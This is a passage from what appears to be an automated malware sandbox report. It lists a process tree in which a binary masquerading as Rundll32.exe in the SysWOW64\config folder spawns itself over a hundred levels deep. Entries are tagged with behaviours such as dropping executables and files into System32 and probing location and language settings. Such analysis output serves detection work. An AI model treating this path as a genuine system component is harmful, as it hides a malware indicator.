PID:3476 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"5⤵
- Executes dropped EXE
PID:4176 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5736 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"7⤵
- Executes dropped EXE
PID:4492 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3428 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5496 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5712 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4256 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"13⤵
- Executes dropped EXE
PID:4772 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"14⤵
- Executes dropped EXE
PID:4324 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5724 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"16⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3060 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"17⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4020 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"18⤵
- Executes dropped EXE
PID:2864 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"19⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5892 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"20⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3008 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"21⤵
- Checks computer location settings
- Executes dropped EXE
PID:2904 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"22⤵
- Executes dropped EXE
PID:2652 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"23⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4836 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"24⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"25⤵
- Executes dropped EXE
PID:3016 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"26⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4324 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"27⤵
- Executes dropped EXE
PID:4912 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"28⤵
- Executes dropped EXE
PID:5264 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"29⤵
- Executes dropped EXE
PID:832 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"30⤵
- Executes dropped EXE
PID:3144 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"31⤵
- Executes dropped EXE
PID:2304 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"32⤵
- Checks computer location settings
- Executes dropped EXE
PID:1076 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"33⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5880 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"34⤵
- Executes dropped EXE
PID:5724 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"35⤵
- Checks computer location settings
- Executes dropped EXE
PID:3992 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"36⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4276 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"37⤵
- Executes dropped EXE
PID:3656 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"38⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"39⤵
- Executes dropped EXE
PID:4792 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"40⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3768 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"41⤵
- Executes dropped EXE
PID:3564 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"42⤵
- Checks computer location settings
- Executes dropped EXE
PID:5352 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"43⤵
- Executes dropped EXE
PID:5580 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"44⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1444 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"45⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:312 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"46⤵
- Executes dropped EXE
PID:3228 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"47⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5884 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"48⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4772 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"49⤵
- Executes dropped EXE
PID:3556 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"50⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3968 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"51⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2396 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"52⤵
- System Location Discovery: System Language Discovery
PID:5856 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"53⤵PID:1276
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"54⤵
- Drops file in System32 directory
PID:4340 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"55⤵PID:5480
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"56⤵PID:5848
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"57⤵PID:2432
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"58⤵
- System Location Discovery: System Language Discovery
PID:5176 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"59⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3696 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"60⤵
- Drops file in System32 directory
PID:2720 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"61⤵PID:2568
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"62⤵
- Drops file in System32 directory
PID:5696 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"63⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1384 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"64⤵PID:4468
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"65⤵
- Checks computer location settings
PID:312 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"66⤵PID:3588
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"67⤵PID:2968
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"68⤵
- Checks computer location settings
PID:4772 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"69⤵PID:3632
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"70⤵
- System Location Discovery: System Language Discovery
PID:2164 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"71⤵
- System Location Discovery: System Language Discovery
PID:1512 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"72⤵PID:1076
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"73⤵PID:5320
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"74⤵PID:656
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"75⤵
- Drops file in System32 directory
PID:6060 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"76⤵
- Checks computer location settings
PID:2512 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"77⤵
- Checks computer location settings
PID:3100 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"78⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2832 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"79⤵
- Drops file in System32 directory
PID:3564 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"80⤵
- System Location Discovery: System Language Discovery
PID:5352 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"81⤵
- Drops file in System32 directory
PID:4652 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"82⤵PID:5464
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"83⤵
- Checks computer location settings
- Drops file in System32 directory
PID:1384 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"84⤵
- Checks computer location settings
PID:5984 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"85⤵PID:4708
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"86⤵PID:4912
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"87⤵PID:3268
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"88⤵PID:1940
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"89⤵
- Drops file in System32 directory
PID:2484 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"90⤵
- System Location Discovery: System Language Discovery
PID:5624 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"91⤵PID:1316
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"92⤵
- System Location Discovery: System Language Discovery
PID:916 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"93⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:808 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"94⤵
- Checks computer location settings
PID:2864 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"95⤵PID:6076
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"96⤵
- Drops file in System32 directory
PID:6020 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"97⤵
- Drops file in System32 directory
PID:1952 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"98⤵
- Checks computer location settings
PID:5508 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"99⤵PID:4384
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"100⤵PID:4484
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"101⤵
- Checks computer location settings
PID:5684 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"102⤵
- Checks computer location settings
PID:3776 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"103⤵PID:312
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"104⤵PID:5128
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"105⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2492 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"106⤵
- Checks computer location settings
PID:5884 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"107⤵
- Checks computer location settings
PID:3268 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"108⤵
- Drops file in System32 directory
PID:6072 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"109⤵
- Checks computer location settings
PID:5788 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"110⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1512 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"111⤵
- Checks computer location settings
- Drops file in System32 directory
PID:4276 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"112⤵
- Checks computer location settings
PID:2756 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"113⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:656 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"114⤵PID:4728
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"115⤵
- Checks computer location settings
PID:1284 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"116⤵PID:5592
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"117⤵PID:1108
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"118⤵
- Drops file in System32 directory
PID:3436 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"119⤵PID:5892
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"120⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1572 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"121⤵PID:5900
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"122⤵PID:1804
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-